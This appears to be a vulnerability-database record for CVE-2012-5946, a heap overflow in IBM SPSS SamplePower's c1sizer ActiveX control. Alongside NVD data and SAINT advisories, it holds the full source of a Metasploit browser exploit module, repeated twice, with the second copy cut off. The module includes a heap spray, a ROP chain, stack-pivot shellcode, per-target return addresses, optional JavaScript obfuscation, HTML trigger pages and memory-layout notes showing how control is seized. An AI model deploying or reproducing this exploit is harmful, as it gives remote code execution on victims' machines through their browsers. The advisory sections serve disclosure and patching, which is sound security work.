{"bulletinFamily": "exploit", "id": "D2SEC_C1SIZER", "lastseen": "2019-05-29T19:19:04", "description": "**Name**| d2sec_c1sizer \n---|--- \n**CVE**| CVE-2012-5946 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| IBM SPSS SamplePower c1sizer ActiveX Buffer Overflow Vulnerability \n**Notes**| \n", "cvelist": ["CVE-2012-5946"], "viewCount": 522, "published": "2013-04-30T03:33:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_c1sizer", "references": [], "reporter": "DSquare", "edition": 2, "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "title": "DSquare Exploit Pack: D2SEC_C1SIZER", "modified": "2013-04-30T03:33:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-5946"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IBM_SPSS_C1SIZER"]}, {"type": "saint", "idList": ["SAINT:A011636D5CE9E9D3AC24C8576B51AD6E", "SAINT:C175CA32409C572DC23F3D34047F27B4", "SAINT:245B72AB0878CB99CD872C6F2CAFA3F8"]}, {"type": "exploitdb", "idList": ["EDB-ID:25814"]}, {"type": "zdt", "idList": ["1337DAY-ID-20824"]}, {"type": "zdi", "idList": ["ZDI-13-100"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121760"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803398", "OPENVAS:803398"]}, {"type": "nessus", "idList": ["IBM_SPSS_SAMPLE_POWER_ACTIVEX.NASL"]}], "modified": "2019-05-29T19:19:04", "rev": 2}, "score": {"value": 7.9, "vector": "NONE", "modified": "2019-05-29T19:19:04", "rev": 2}, "vulnersScore": 7.9}, "type": "d2", "scheme": null}

{"cve": [{"lastseen": "2020-10-03T12:06:12", "description": "Buffer overflow in the c1sizer ActiveX control in C1sizer.ocx in IBM SPSS SamplePower 3.0 before FP1 allows remote attackers to execute arbitrary code via a long TabCaption string.", "edition": 3, "cvss3": {}, "published": "2013-04-30T03:33:00", "title": "CVE-2012-5946", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5946"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:ibm:spss_samplepower:3.0.0.0"], "id": "CVE-2012-5946", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5946", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ibm:spss_samplepower:3.0.0.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5946"], "description": "Added: 06/09/2013 \nCVE: [CVE-2012-5946](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5946>) \nBID: [59559](<http://www.securityfocus.com/bid/59559>) \nOSVDB: [92845](<http://www.osvdb.org/92845>) \n\n\n### Background\n\nSPSS (Statistical Package for the Social Sciences) is a computer application that provides statistical analysis of data. It allows for in-depth data access and preparation, analytical reporting, graphics and modelling. SamplePower is a stand-alone product designed to work seamlessly with SPSS. It allows researchers to compare the effects of different study parameters, such as sample size, using analytical tools before beginning the study. \n\n### Problem\n\nIBM SPSS SamplePower 3.0 and earlier ship with an ActiveX control (`**c1sizer.ocx**`) that does not properly check the data size when handling the `**TabCaption**` buffer. A remote attacker could exploit this vulnerability to cause a heap buffer overflow that could allow arbitrary remote code execution. \n\n### Resolution\n\nDownload and install IBM SamplePower 3.0 FP1 as referenced in [IBM Security Bulletin IBM SPSS SamplePower c1sizer ActiveX control vulnerability (CVE-2012-5946)](<http://www-01.ibm.com/support/docview.wss?uid=swg21635476>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-101/> \n<http://www-01.ibm.com/support/docview.wss?uid=swg21635476> \n\n\n### Limitations\n\nThis exploit was tested against IBM SPSS SamplePower 3.0 on Windows XP SP3 English (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 on the target machine. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-06-09T00:00:00", "published": "2013-06-09T00:00:00", "id": "SAINT:245B72AB0878CB99CD872C6F2CAFA3F8", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ibm_spss_samplepower_c1sizer", "type": "saint", "title": "IBM SPSS SamplePower c1sizer ActiveX Control Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5946"], "description": "Added: 06/09/2013 \nCVE: [CVE-2012-5946](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5946>) \nBID: [59559](<http://www.securityfocus.com/bid/59559>) \nOSVDB: [92845](<http://www.osvdb.org/92845>) \n\n\n### Background\n\nSPSS (Statistical Package for the Social Sciences) is a computer application that provides statistical analysis of data. It allows for in-depth data access and preparation, analytical reporting, graphics and modelling. SamplePower is a stand-alone product designed to work seamlessly with SPSS. It allows researchers to compare the effects of different study parameters, such as sample size, using analytical tools before beginning the study. \n\n### Problem\n\nIBM SPSS SamplePower 3.0 and earlier ship with an ActiveX control (`**c1sizer.ocx**`) that does not properly check the data size when handling the `**TabCaption**` buffer. A remote attacker could exploit this vulnerability to cause a heap buffer overflow that could allow arbitrary remote code execution. \n\n### Resolution\n\nDownload and install IBM SamplePower 3.0 FP1 as referenced in [IBM Security Bulletin IBM SPSS SamplePower c1sizer ActiveX control vulnerability (CVE-2012-5946)](<http://www-01.ibm.com/support/docview.wss?uid=swg21635476>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-101/> \n<http://www-01.ibm.com/support/docview.wss?uid=swg21635476> \n\n\n### Limitations\n\nThis exploit was tested against IBM SPSS SamplePower 3.0 on Windows XP SP3 English (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 on the target machine. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-06-09T00:00:00", "published": "2013-06-09T00:00:00", "id": "SAINT:C175CA32409C572DC23F3D34047F27B4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ibm_spss_samplepower_c1sizer", "title": "IBM SPSS SamplePower c1sizer ActiveX Control Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5946"], "edition": 2, "description": "Added: 06/09/2013 \nCVE: [CVE-2012-5946](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5946>) \nBID: [59559](<http://www.securityfocus.com/bid/59559>) \nOSVDB: [92845](<http://www.osvdb.org/92845>) \n\n\n### Background\n\nSPSS (Statistical Package for the Social Sciences) is a computer application that provides statistical analysis of data. It allows for in-depth data access and preparation, analytical reporting, graphics and modelling. SamplePower is a stand-alone product designed to work seamlessly with SPSS. It allows researchers to compare the effects of different study parameters, such as sample size, using analytical tools before beginning the study. \n\n### Problem\n\nIBM SPSS SamplePower 3.0 and earlier ship with an ActiveX control (`**c1sizer.ocx**`) that does not properly check the data size when handling the `**TabCaption**` buffer. A remote attacker could exploit this vulnerability to cause a heap buffer overflow that could allow arbitrary remote code execution. \n\n### Resolution\n\nDownload and install IBM SamplePower 3.0 FP1 as referenced in [IBM Security Bulletin IBM SPSS SamplePower c1sizer ActiveX control vulnerability (CVE-2012-5946)](<http://www-01.ibm.com/support/docview.wss?uid=swg21635476>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-101/> \n<http://www-01.ibm.com/support/docview.wss?uid=swg21635476> \n\n\n### Limitations\n\nThis exploit was tested against IBM SPSS SamplePower 3.0 on Windows XP SP3 English (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 on the target machine. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-06-09T00:00:00", "published": "2013-06-09T00:00:00", "id": "SAINT:A011636D5CE9E9D3AC24C8576B51AD6E", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ibm_spss_samplepower_c1sizer", "type": "saint", "title": "IBM SPSS SamplePower c1sizer ActiveX Control Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-09T23:26:34", "edition": 2, "description": "Exploit for windows platform in category remote exploits", "published": "2013-05-29T00:00:00", "type": "zdt", "title": "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5946"], "modified": "2013-05-29T00:00:00", "id": "1337DAY-ID-20824", "href": "https://0day.today/exploit/description/20824", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"8.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => NormalRanking,\r\n :classid => \"{24E04EBF-014D-471F-930E-7654B1193BA9}\",\r\n :method => \"TabCaption\"\r\n })\r\n\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow\",\r\n 'Description' => %q{\r\n This module exploits a heap based buffer overflow in the C1Tab ActiveX control,\r\n while handling the TabCaption property. The affected control can be found in the\r\n c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has\r\n been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7\r\n SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alexander Gavrun', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-5946' ],\r\n [ 'OSVDB', '92845' ],\r\n [ 'BID', '59559' ],\r\n [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21635476' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 991,\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # IBM SPSS SamplePower 3.0 / c1sizer.ocx 8.0.20071.39\r\n [ 'Automatic', {} ],\r\n [ 'IE 6 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x5F4',\r\n 'Ret' => 0x0c0c0c08\r\n }\r\n ],\r\n [ 'IE 7 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x5F4',\r\n 'Ret' => 0x0c0c0c08\r\n }\r\n ],\r\n [ 'IE 8 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x5f4',\r\n 'Ret' => 0x0c0c0c0c,\r\n 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret\r\n }\r\n ],\r\n [ 'IE 8 on Windows 7',\r\n {\r\n 'Offset' => '0x5f4',\r\n 'Ret' => 0x0c0c0c0c,\r\n 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Apr 26 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n print_status(\"target not found #{agent}\")\r\n return nil\r\n end\r\n\r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n\r\n # Land the payload at 0x0c0c0c0c\r\n # For IE 6, 7, 8\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n var overflow = nops.substring(0, 10);\r\n |\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"V\").first\r\n end\r\n\r\n def rop_chain\r\n # gadgets from c1sizer.ocx\r\n rop_gadgets =\r\n [\r\n 0x0c0c0c10,\r\n 0x10026984, # ADD ESP,10 # POP EDI # POP ESI # POP EBX # POP EBP # RETN # stackpivot to the controlled stack\r\n 0x100076f1, # pop eax # ret\r\n 0x10029134, # &VirtualAllox\r\n 0x1001b41e, # jmp [eax]\r\n 0x0c0c0c34, # ret address\r\n 0x0c0c0c0c, # lpAddress\r\n 0x00001000, # dwSize\r\n 0x00001000, # flAllocationType\r\n 0x00000040 # flProtect\r\n ].pack(\"V*\")\r\n\r\n return rop_gadgets\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n # No rop. Just return the payload.\r\n\r\n if (t.name =~ /IE 6/ or t.name =~ /IE 7/)\r\n fake_memory = [\r\n 0x0c0c0c10,\r\n 0x0c0c0c14\r\n ].pack(\"V*\")\r\n return fake_memory + code\r\n end\r\n\r\n return rop_chain + stack_pivot + code\r\n end\r\n\r\n # Objects filling aren't randomized because\r\n # this combination make exploit more reliable.\r\n def fake_object(size)\r\n object = \"B\" * 8 # metadata\r\n object << \"D\" * size # fake object\r\n return object\r\n end\r\n\r\n def stack_pivot\r\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n return pivot\r\n end\r\n\r\n # Check the memory layout documentation at the end of the module\r\n def overflow_xp\r\n buf = rand_text_alpha(0x10000)\r\n # Start to overflow\r\n buf << fake_object(0x40)\r\n buf << fake_object(0x30)\r\n buf << fake_object(0x30)\r\n buf << fake_object(0x40)\r\n buf << fake_object(0x10)\r\n buf << fake_object(0x10)\r\n buf << fake_object(0x20)\r\n buf << fake_object(0x10)\r\n buf << fake_object(0x30)\r\n buf << \"B\" * 0x8 # metadata chunk\r\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\r\n end\r\n\r\n # Check the memory layout documentation at the end of the module\r\n def overflow_xp_ie8\r\n buf = [\r\n junk, # padding\r\n 0x1001b557, # pop eax # c1sizer.ocx\r\n 0x0c0c0c14, # eax\r\n 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap\r\n ].pack(\"V*\")\r\n buf << rand_text_alpha(0x10000-16)\r\n # Start to overflow\r\n buf << \"B\" * 0x8 # metadata chunk\r\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\r\n end\r\n\r\n # Check the memory layout documentation at the end of the module\r\n def overflow_w7\r\n buf = [\r\n junk, # padding\r\n 0x1001b557, # pop eax # c1sizer.ocx\r\n 0x0c0c0c14, # eax\r\n 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap\r\n ].pack(\"V*\")\r\n buf << rand_text_alpha(0x10000-16)\r\n # Start to oveflow\r\n buf << fake_object(0x3f8)\r\n buf << fake_object(0x1a0)\r\n buf << fake_object(0x1e0)\r\n buf << fake_object(0x1a0)\r\n buf << fake_object(0x1e0)\r\n buf << fake_object(0x1a0)\r\n buf << \"B\" * 0x8 # metadata chunk\r\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\r\n end\r\n\r\n def get_overflow(t)\r\n if t.name =~ /Windows 7/\r\n return overflow_w7\r\n elsif t.name =~ /Windows XP/ and t.name =~ /IE 8/\r\n return overflow_xp_ie8\r\n elsif t.name =~ /Windows XP/\r\n return overflow_xp\r\n end\r\n end\r\n\r\n # * 15 C1TAB objects are used to defragement the heap, so objects are stored after the vulnerable buffer.\r\n # * Based on empirical tests, 5th C1TAB comes after the vulnerable buffer.\r\n # * Using the 7th CITAB is possible to overflow itself and get control before finishing the set of the\r\n # TabCaption property.\r\n def trigger_w7\r\n target = rand_text_alpha(5 + rand(3))\r\n target2 = rand_text_alpha(5 + rand(3))\r\n target3 = rand_text_alpha(5 + rand(3))\r\n target4 = rand_text_alpha(5 + rand(3))\r\n target5 = rand_text_alpha(5 + rand(3))\r\n target6 = rand_text_alpha(5 + rand(3))\r\n target7 = rand_text_alpha(5 + rand(3))\r\n target8 = rand_text_alpha(5 + rand(3))\r\n target9 = rand_text_alpha(5 + rand(3))\r\n target10 = rand_text_alpha(5 + rand(3))\r\n target11 = rand_text_alpha(5 + rand(3))\r\n target12 = rand_text_alpha(5 + rand(3))\r\n target13 = rand_text_alpha(5 + rand(3))\r\n target14 = rand_text_alpha(5 + rand(3))\r\n target15 = rand_text_alpha(5 + rand(3))\r\n\r\n objects = %Q|\r\n <object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target2}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target3}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target4}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target5}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target6}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target7}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target8}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target9}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target10}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target11}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target12}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target13}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target14}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target15}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n |\r\n return objects, target7\r\n end\r\n\r\n # * Based on empirical test, the C1TAB object comes after the vulnerable buffer on memory, so just\r\n # an object is sufficient to overflow itself and get control execution.\r\n def trigger_xp\r\n target = rand_text_alpha(5 + rand(3))\r\n\r\n objects = %Q|\r\n <object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n |\r\n return objects, target\r\n end\r\n\r\n def get_trigger(t)\r\n if t.name =~ /Windows 7/\r\n return trigger_w7\r\n elsif t.name =~ /Windows XP/\r\n return trigger_xp\r\n end\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n buf = get_overflow(my_target)\r\n\r\n objects, target_object = get_trigger(my_target)\r\n\r\n html = %Q|\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n #{objects}\r\n <script>\r\n CollectGarbage();\r\n #{js}\r\n #{target_object}.Caption = \"\";\r\n #{target_object}.TabCaption(0) = \"#{buf}\";\r\n </script>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n[*] Windows XP / ie6 & ie7 memory layout at oveflow, based on empirical test\r\n\r\n Heap entries for Segment01 in Heap 01ca0000\r\n address: psize . size flags state (requested size)\r\n 025c0000: 00000 . 00040 [01] - busy (40)\r\n 025c0040: 00040 . 10008 [01] - busy (10000)\r\n 025d0048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer\r\n 025e0050: 10008 . 00048 [01] - busy (40)\r\n 025e0098: 00048 . 00038 [01] - busy (30)\r\n 025e00d0: 00038 . 00038 [01] - busy (30)\r\n 025e0108: 00038 . 00048 [01] - busy (40)\r\n 025e0150: 00048 . 00018 [01] - busy (10)\r\n 025e0168: 00018 . 00018 [01] - busy (10)\r\n 025e0180: 00018 . 00028 [01] - busy (20)\r\n 025e01a8: 00028 . 00018 [01] - busy (10)\r\n 025e01c0: 00018 . 00010 [00]\r\n 025e01d0: 00010 . 00038 [01] - busy (30)\r\n 025e0208: 00038 . 001e8 [01] - busy (1e0) // Vulnerable object\r\n 025e03f0: 001e8 . 001a8 [01] - busy (1a0)\r\n\r\n\r\n[*] Windows XP / ie8 memory layout at oveflow, based on empirical test\r\n\r\n Heap entries for Segment01 in Heap 03350000\r\n address: psize . size flags state (requested size)\r\n 03840000: 00000 . 00040 [01] - busy (40)\r\n 03840040: 00040 . 10008 [01] - busy (10000)\r\n 03850048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer\r\n 03860050: 10008 . 001e8 [01] - busy (1e0) // Vulnerable object\r\n 03860238: 001e8 . 001a8 [01] - busy (1a0)\r\n 038603e0: 001a8 . 00078 [00]\r\n 03860458: 00078 . 00048 [01] - busy (40)\r\n 038604a0: 00048 . 00048 [01] - busy (40)\r\n 038604e8: 00048 . 00618 [01] - busy (610)\r\n 03860b00: 00618 . 10208 [01] - busy (10200)\r\n 03870d08: 10208 . 032f8 [10]\r\n 03874000: 000cc000 - uncommitted bytes.\r\n\r\n\r\n[*] windows 7 / ie8 memory layout at oveflow, based on empirical test\r\n\r\n 03240000: 00000 . 00040 [101] - busy (3f)\r\n 03240040: 00040 . 10008 [101] - busy (10000)\r\n 03250048: 10008 . 10008 [101] - busy (10000) # Overwritten buffer\r\n 03260050: 10008 . 00400 [101] - busy (3f8) Internal\r\n 03260450: 00400 . 001a8 [101] - busy (1a0)\r\n 032605f8: 001a8 . 001e8 [101] - busy (1e0)\r\n 032607e0: 001e8 . 001a8 [101] - busy (1a0)\r\n 03260988: 001a8 . 001e8 [101] - busy (1e0)\r\n 03260b70: 001e8 . 001a8 [101] - busy (1a0)\r\n 03260d18: 001a8 . 001e8 [101] - busy (1e0) # Our vulnerable object, target7, seems reliable according to testing\r\n 03260f00: 001e8 . 001a8 [101] - busy (1a0)\r\n 032610a8: 001a8 . 001e8 [101] - busy (1e0)\r\n 03261290: 001e8 . 001a8 [101] - busy (1a0)\r\n 03261438: 001a8 . 001e8 [101] - busy (1e0)\r\n 03261620: 001e8 . 001a8 [101] - busy (1a0)\r\n 032617c8: 001a8 . 001e8 [101] - busy (1e0)\r\n\r\n[*] Overflow:\r\n\r\n.text:100146E1 push eax ; lpString2\r\n.text:100146E2 push CaptionlpBuffer ; lpString1\r\n.text:100146E8 call ds:lstrcatA ; Heap Overflow when setting a new CaptionString > 0x10000\r\n\r\n[*] Get Control after overflow:\r\n\r\n.text:1001A40D call overflow_sub_1001469E ; Overflow happens here\r\n.text:1001A412 mov ecx, edi ; edi points to the overflowed object, then ecx (this)\r\n.text:1001A414 call get_control_sub_100189EC ; Get profit from the overflowed object here\r\n\r\n.text:100189EC get_control_sub_100189EC proc near ; CODE XREF: sub_1001A1A9+B6\u0019p\r\n.text:100189EC ; SetTabCaption_sub_1001A2EC+128\u0019p ...\r\n.text:100189EC\r\n.text:100189EC var_4 = dword ptr -4\r\n.text:100189EC\r\n.text:100189EC push ebp\r\n.text:100189ED mov ebp, esp\r\n.text:100189EF push ecx\r\n.text:100189F0 mov eax, [ecx+10h] # ecx points to controlled memory, so eax can be controlled\r\n.text:100189F3 and [ebp+var_4], 0\r\n.text:100189F7 test eax, eax\r\n.text:100189F9 jz short locret_10018A23\r\n.text:100189FB mov ecx, [eax] # eax can be controlled and make it point to sprayed mem, ecx can be controlled\r\n.text:100189FD lea edx, [ebp+var_4]\r\n.text:10018A00 push edx\r\n.text:10018A01 push offset unk_1002B628\r\n.text:10018A06 push eax\r\n.text:10018A07 call dword ptr [ecx] # woot!\r\n\r\n=end\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20824"}], "exploitdb": [{"lastseen": "2016-02-03T02:14:00", "description": "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow. CVE-2012-5946. Remote exploit for windows platform", "published": "2013-05-29T00:00:00", "type": "exploitdb", "title": "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5946"], "modified": "2013-05-29T00:00:00", "id": "EDB-ID:25814", "href": "https://www.exploit-db.com/exploits/25814/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"8.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => NormalRanking,\r\n :classid => \"{24E04EBF-014D-471F-930E-7654B1193BA9}\",\r\n :method => \"TabCaption\"\r\n })\r\n\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow\",\r\n 'Description' => %q{\r\n This module exploits a heap based buffer overflow in the C1Tab ActiveX control,\r\n while handling the TabCaption property. The affected control can be found in the\r\n c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has\r\n been tested successfully on IE 6, 